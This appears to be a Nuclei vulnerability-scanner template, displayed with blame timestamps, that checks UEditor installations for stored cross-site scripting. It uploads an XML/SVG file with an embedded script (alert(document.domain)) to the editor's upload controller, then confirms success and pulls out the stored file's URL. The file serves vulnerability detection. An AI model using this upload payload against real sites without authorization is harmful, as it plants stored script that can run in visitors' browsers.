nuclei-templates/http/vulnerabilities/ueditor/ueditor-xss.yaml

74 lines
2.2 KiB
YAML
Raw Permalink Normal View History

2023-03-16 10:48:31 +00:00
id: ueditor-xss
info:
2023-03-17 10:22:40 +00:00
name: ueditor - Cross Site Scripting
2023-03-16 10:48:31 +00:00
author: pwnhxl
2023-03-17 10:22:40 +00:00
severity: high
description: |
2023-03-17 11:56:23 +00:00
The latest vulnerability version of UEditor, a rich text web editor, allows for XML file uploads which can lead to stored cross-site scripting (XSS) attacks.
2023-03-16 10:48:31 +00:00
reference:
- https://blog.csdn.net/weixin_50464560/article/details/124803185
- https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3
2023-03-17 10:22:40 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-03-17 10:22:40 +00:00
shodan-query: title:"ueditor"
2023-10-14 11:27:55 +00:00
tags: ueditor,xss,intrusive
2023-03-16 10:48:31 +00:00
variables:
randstring: "{{to_lower(rand_base(16))}}"
http:
2023-03-16 10:48:31 +00:00
- raw:
- |
2023-03-17 10:22:40 +00:00
POST /ueditor/php/controller.php?action=uploadfile HTTP/1.1
2023-03-16 10:48:31 +00:00
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="upfile"; filename="test.xml"
Content-Type: application/vnd.ms-excel
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
2023-03-17 10:22:40 +00:00
alert(document.domain);
2023-03-16 10:48:31 +00:00
</script>
</svg>
------WebKitFormBoundary{{randstring}}--
stop-at-first-match: true
2023-10-14 11:27:55 +00:00
2023-03-16 10:48:31 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-03-17 10:22:40 +00:00
- 'state":"SUCCESS'
- '.xml","title'
2023-03-16 10:48:31 +00:00
condition: and
2023-03-17 10:22:40 +00:00
- type: word
part: header
words:
- "text/html"
2023-03-16 10:48:31 +00:00
- type: status
status:
2023-03-17 10:22:40 +00:00
- 200
extractors:
- type: regex
name: file_path
part: body
group: 1
regex:
- 'url":"(.*)","title'
# digest: 4b0a00483046022100cf315c37c27551e82d66ab834657bf4ea22bdd09b6ed0fa0b9a455dc001b4d630221009c94b9df84687e47c0fac6007b4aa52294792cd4fcf4fdac122c77b8c510c45d:922c64590222798bb761d5b6d8e72950